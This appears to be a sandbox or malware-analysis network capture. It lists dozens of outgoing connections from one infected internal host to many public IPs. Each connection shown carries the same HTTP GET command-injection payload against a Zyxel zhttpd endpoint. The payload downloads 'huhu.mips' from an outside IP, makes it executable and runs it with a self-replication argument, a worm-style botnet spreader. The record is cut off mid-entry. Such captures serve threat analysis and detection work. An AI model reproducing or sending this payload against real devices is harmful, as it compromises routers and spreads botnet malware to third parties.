                                                  Jan 19, 2024 18:23:47.895915031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2599192.168.2.1336804209.235.63.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895963907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2600192.168.2.135074682.36.93.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896022081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2601192.168.2.1356092114.149.163.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896080017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2602192.168.2.1353522213.3.164.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896119118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2603192.168.2.1343054192.86.141.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896163940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2604192.168.2.1349668213.134.196.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896233082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2605192.168.2.135626057.160.53.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896250010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2606192.168.2.1344018188.254.97.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896303892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2607192.168.2.1342052206.173.123.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896333933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2608192.168.2.135572887.154.207.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896368027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2609192.168.2.13459222.1.172.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896408081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2610192.168.2.135568642.121.2.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896471024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2611192.168.2.1337156190.94.109.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896496058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2612192.168.2.1358298218.218.161.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896539927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2613192.168.2.1349508101.254.181.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896585941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2614192.168.2.1334542139.242.228.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896616936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2615192.168.2.1335090185.127.174.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896686077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2616192.168.2.133750047.5.135.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896712065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2617192.168.2.1359924200.246.129.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896753073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2618192.168.2.135096691.27.247.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896797895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2619192.168.2.1352874212.82.87.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896845102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2620192.168.2.134433049.152.29.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896876097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2621192.168.2.135295624.86.221.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896931887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2622192.168.2.1349498150.193.205.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.896955967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2623192.168.2.1335082192.43.201.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897007942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2624192.168.2.1358448135.49.96.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897049904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2625192.168.2.1333510174.114.178.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897100925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2626192.168.2.1353646184.195.10.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897135973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2627192.168.2.1338398196.139.250.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897160053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2628192.168.2.135209689.242.119.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897202015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2629192.168.2.1351246193.59.104.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897233009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2630192.168.2.134882634.243.127.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897254944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2631192.168.2.133871651.63.42.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897305012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2632192.168.2.1344930189.109.61.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897356987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2633192.168.2.1351124194.14.138.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897406101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2634192.168.2.1340094101.230.89.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897447109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2635192.168.2.1338950179.204.0.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897499084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2636192.168.2.1347482220.220.249.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897555113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2637192.168.2.1342950103.96.136.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897587061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2638192.168.2.133499281.91.193.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897625923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2639192.168.2.13584402.198.230.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.897686005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2640192.168.2.1352648216.45.107.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.898744106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2641192.168.2.1349078141.243.132.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.900002956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2642192.168.2.1339030124.231.198.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.909801006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2643192.168.2.1334128151.168.135.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.909840107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2644192.168.2.134279090.225.141.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.909918070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2645192.168.2.1335832174.88.120.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.909931898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2646192.168.2.1347138197.47.51.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.909971952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2647192.168.2.1345840196.144.127.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910022974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2648192.168.2.1346282147.53.139.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910058975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2649192.168.2.134585064.215.231.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910119057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2650192.168.2.134301096.225.101.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910157919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2651192.168.2.135524465.131.33.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910192966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2652192.168.2.1348056159.201.234.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910242081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2653192.168.2.1336020130.255.53.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910269976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2654192.168.2.135531865.12.13.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910303116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2655192.168.2.13597084.161.70.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910348892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2656192.168.2.134051448.130.220.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910387039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2657192.168.2.1342660153.188.53.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910420895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2658192.168.2.1334702112.118.171.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910444975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2659192.168.2.1341494220.191.60.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910471916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2660192.168.2.135943062.206.249.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910505056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2661192.168.2.1340800168.64.204.47443
                                                  TimestampBytes transferredDirectionData
